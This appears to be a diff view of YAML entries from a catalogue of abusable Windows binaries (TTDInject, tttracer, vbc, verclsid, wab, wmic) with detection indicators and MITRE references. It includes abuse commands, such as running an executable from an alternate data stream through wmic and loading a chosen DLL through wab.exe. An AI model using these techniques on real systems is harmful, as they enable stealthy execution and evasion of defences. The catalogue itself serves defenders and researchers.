Description: Example command on how inject Powershell code into the process Description: Example command on how inject Powershell code into the process
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed

View File

@ -2,7 +2,7 @@
Name: Ttdinject.exe Name: Ttdinject.exe
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: 'Maxime Nadeau' Author: 'Maxime Nadeau'
Created: '2020-05-12' Created: 2020-05-12
Commands: Commands:
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
@ -23,9 +23,9 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Parent child relationship. Ttdinject.exe parent for executed command - IOC: Parent child relationship. Ttdinject.exe parent for executed command
- IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
Resources: Resources:

View File

@ -2,7 +2,7 @@
Name: Tttracer.exe Name: Tttracer.exe
Description: Used by Windows 1809 and newer to Debug Time Travel Description: Used by Windows 1809 and newer to Debug Time Travel
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2019-11-5' Created: 2019-11-05
Commands: Commands:
- Command: tttracer.exe C:\windows\system32\calc.exe - Command: tttracer.exe C:\windows\system32\calc.exe
Description: Execute calc using tttracer.exe. Requires administrator privileges Description: Execute calc using tttracer.exe. Requires administrator privileges
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\System32\tttracer.exe
- Path: C:\Windows\SysWOW64\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Parent child relationship. Tttracer parent for executed command - IOC: Parent child relationship. Tttracer parent for executed command

View File

@ -2,7 +2,7 @@
Name: vbc.exe Name: vbc.exe
Description: Binary file used for compile vbs code Description: Binary file used for compile vbs code
Author: Lior Adar Author: Lior Adar
Created: 27/02/2020 Created: 2020-02-27
Commands: Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe Description: Binary file used by .NET to compile vb code to .exe
@ -11,7 +11,7 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/ MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10,7 OperatingSystem: Windows 10,7
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Description of the second command Description: Description of the second command
Usecase: A description of the usecase Usecase: A description of the usecase
@ -19,11 +19,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/ MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10,7 OperatingSystem: Windows 10,7
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Acknowledgement: Acknowledgement:
- Person: Lior Adar - Person: Lior Adar

View File

@ -1,8 +1,8 @@
--- ---
Name: Verclsid.exe Name: Verclsid.exe
Description: Description:
Author: '@bohops' Author: '@bohops'
Created: '2018-12-04' Created: 2018-12-04
Commands: Commands:
- Command: verclsid.exe /S /C {CLSID} - Command: verclsid.exe /S /C {CLSID}
Description: Used to verify a COM object before it is instantiated by Windows Explorer Description: Used to verify a COM object before it is instantiated by Windows Explorer
@ -15,10 +15,10 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

View File

@ -2,7 +2,7 @@
Name: Wab.exe Name: Wab.exe
Description: Windows address book manager Description: Windows address book manager
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: wab.exe - Command: wab.exe
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: WAB.exe should normally never be used - IOC: WAB.exe should normally never be used
@ -25,4 +25,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@Hexacorn' Handle: '@Hexacorn'
--- ---

View File

@ -2,7 +2,7 @@
Name: Wmic.exe Name: Wmic.exe
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe" - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
@ -71,7 +71,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\System32\wbem\wmic.exe
- Path: C:\Windows\SysWOW64\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Wmic getting scripts from remote system - IOC: Wmic getting scripts from remote system
@ -82,4 +82,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
--- ---

Some files were not shown because too many files have changed in this diff Show More